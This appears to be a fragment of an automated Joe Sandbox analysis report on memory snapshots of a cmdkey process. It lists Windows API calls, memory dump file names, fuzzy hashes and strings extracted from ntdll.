                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030184BC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                                                                                                                                                                                                                                • Instruction ID: a44b26576feb8461b8af3b18f6979302130490ede10a485ebddad7762015a392
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE0263520230827EB34EAB8DC45FA2338C9B48624F4C8A60B81CCBAC1EB78F6114250
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011DE0,0302813F,030257FF,03011DB0), ref: 030182B3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                                                                                                                                                                                                                                • Instruction ID: 39b97f98ab214aa18ce3ac110bfd8e664741b1ec3914730718550dd92aabebab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E0C2396413047BE604E2E4DC06F6172CCA784254F444468FD08EB2C2E965A1204664
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011DE0,0302813F,030257FF,03011DB0), ref: 030182B3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                                                                                                                                                                                                                                • Instruction ID: 038f465c39ee70073ac2834d93bf8a3695b2c8bb7029d0f54e7b21592af3db73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13D05E796413047BF604F6E4DC06FA672CCAB44654F484464F908EB3C2E965F15046A5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 3e984a44776e951f8274f56ecbfe3c00ce23efb0626755a85a6c7d0721b17b9b
                                                                                                                                                                                                                                                                • Instruction ID: 0df53db8f8e2104931b04f3dc41fcea9be4ddeda75413b330a7970b507f2394b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e984a44776e951f8274f56ecbfe3c00ce23efb0626755a85a6c7d0721b17b9b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87B09B719055C5CDDA11D76047087177954A7D0701F15C495D6564645E8738C491F275
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                                                                                                                                                                                                                                • Instruction ID: 081428474a72d80c513fdb6a530d7d6e058653424a0cf24965e6a7edca54aff2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D41E370A1DB095FD368FF689081676B2E5FB8D300F100A2DD88AC3352EA70E8468789
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                                • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                                                                                                                                                                                                                                • Instruction ID: d0d9e37900135b78806ec416c9d31d79a060e645120aaf2330a6e298879dbaf0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3915FF04483948AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03924592
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0392454D
                                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 039244AB
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03924507
                                                                                                                                                                                                                                                                • Execute=1, xrefs: 0392451E
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03924460
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03924530
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                                • Opcode ID: fc0b4b3f5661f07301092a52774383dc6aab3f849877293a41611fae4d3ab1a6
                                                                                                                                                                                                                                                                • Instruction ID: 02043444efc70878aebda593d832dbcc89fcdf1315412418852361968b0620a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc0b4b3f5661f07301092a52774383dc6aab3f849877293a41611fae4d3ab1a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA510735A003197EEF10EBD9EC89FAD77A8EF49304F0805E9E515EB281EB709A45CB51
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $$@$@wv
                                                                                                                                                                                                                                                                • API String ID: 0-2230787357
                                                                                                                                                                                                                                                                • Opcode ID: 4300f03d21195fd8b8105c9f8498c38029f41a0a0e131e08eb51007c964e1f24
                                                                                                                                                                                                                                                                • Instruction ID: 412c456b4aceec41c8ed98c54a39e747d680a061b632465a27a55aa8b1388953
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4300f03d21195fd8b8105c9f8498c38029f41a0a0e131e08eb51007c964e1f24
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C813A71D002699BDB25DB94CC44BEEB7B8AF08750F0445EAEA09F7280D7309E85DFA1